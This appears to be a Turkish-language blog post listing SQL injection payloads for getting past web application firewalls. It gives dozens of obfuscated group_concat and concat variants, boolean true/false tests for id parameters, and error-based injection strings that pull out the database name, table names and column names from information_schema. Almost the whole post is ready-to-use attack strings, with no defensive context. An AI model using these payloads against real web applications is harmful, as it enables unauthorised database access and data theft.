27 Temmuz 2021 Salı

SQL Web Uygulama G.Duvar_ GroupConcat Atlatma

 


SQL Web Uygulama G.Duvarı GroupConcat Atlatma 


SQL Web Uygulama Güvenlik Duvarı GroupConcat Bypass Atlatma Örnekleri


SQL Waf Group_Concat Bypass Örnekleri


Group_Concat

   group_concat()

   /*!group_concat*/()

   grOUp_ConCat(/*!*/,0x3e,/*!*/)

   group_concat(,0x3c62723e)

   g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29

   CoNcAt()

   CONCAT(DISTINCT Version())

   concat(,0x3a,)

   concat%00()

   %00CoNcAt()

   /*!50000cOnCat*/(/*!Version()*/)

   /*!50000cOnCat*/

   /**//*!12345cOnCat*/(,0x3a,)

   concat_ws()

   concat(0x3a,,0x3c62723e)

   /*!concat_ws(0x3a,)*/

   concat_ws(0x3a3a3a,version()

   CONCAT_WS(CHAR(32,58,32),version(),)

[~] group_concat() [~]

/*!group_concat*/()

gRoUp_cOnCAt()

group_concat(/*!*/)

group_concat(/*!12345table_name*/)

group_concat(/*!50000table_name*/)

/*!group_concat*/(/*!12345table_name*/)

/*!group_concat*/(/*!50000table_name*/)

/*!12345group_concat*/(/*!12345table_name*/)

/*!50000group_concat*/(/*!50000table_name*/)

/*!GrOuP_ConCaT*/()

/*!12345GroUP_ConCat*/()

/*!50000gRouP_cOnCaT*/()

/*!50000Gr%6fuP_c%6fnCAT*/()

unhex(hex(group_concat(table_name)))

unhex(hex(/*!group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(table_name)))

unhex(hex(/*!12345group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))

unhex(hex(/*!50000group_concat*/(table_name)))

unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))

convert(group_concat(table_name)+using+ascii)

convert(group_concat(/*!table_name*/)+using+ascii)

convert(group_concat(/*!12345table_name*/)+using+ascii)

convert(group_concat(/*!50000table_name*/)+using+ascii)

CONVERT(group_concat(table_name)+USING+latin1)

CONVERT(group_concat(table_name)+USING+latin2)

CONVERT(group_concat(table_name)+USING+latin3)

CONVERT(group_concat(table_name)+USING+latin4)

CONVERT(group_concat(table_name)+USING+latin5)

Group_Concat

group_concat ()

/*!group_concat*/ ()

grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )

group_concat (, 0x3c62723e )

g % 72oup_c % 6Fncat % 28 % 76% 65rsion

% 28 %29 ,% 22 ~ BlackRose% 22 %29

CoNcAt ()

CONCAT (DISTINCT Version ())

concat (, 0x3a ,)

concat %00 ()

% 00CoNcAt ()

/*!50000cOnCat*/ ( /*!Version()*/ )

/*!50000cOnCat*/

/**//*!12345cOnCat*/ (, 0x3a ,)

concat_ws ()

concat (0x3a ,, 0x3c62723e )

/*!concat_ws(0x3a,)*/

concat_ws ( 0x3a3a3a , version()

CONCAT_WS ( CHAR ( 32, 58, 32 ), version

(),)

REVERSE( tacnoc )

binary (version ())

uncompress (compress ( version()))

aes_decrypt ( aes_encrypt ( version

(), 1), 1 )[/ b ][/ u ][/ size ]


[~] after id no. like id=1 +/*!and*/+1=0 [~]

+div+0

Having+1=0

+AND+1=0

+/*!and*/+1=0

and(1)=(0)


---


HATA KAYNAKLI GROUP CONCAT ATLATMA

=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–

--

VERİTABANI GROUP CONCAT ATLATMA

21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--

TABLO İSİMLERİ GROUP CONCAT ATLATMA

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--

KOLON SAYILARI GROUP CONCAT ATLATMA

21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

0 comments:

Yorum Gönder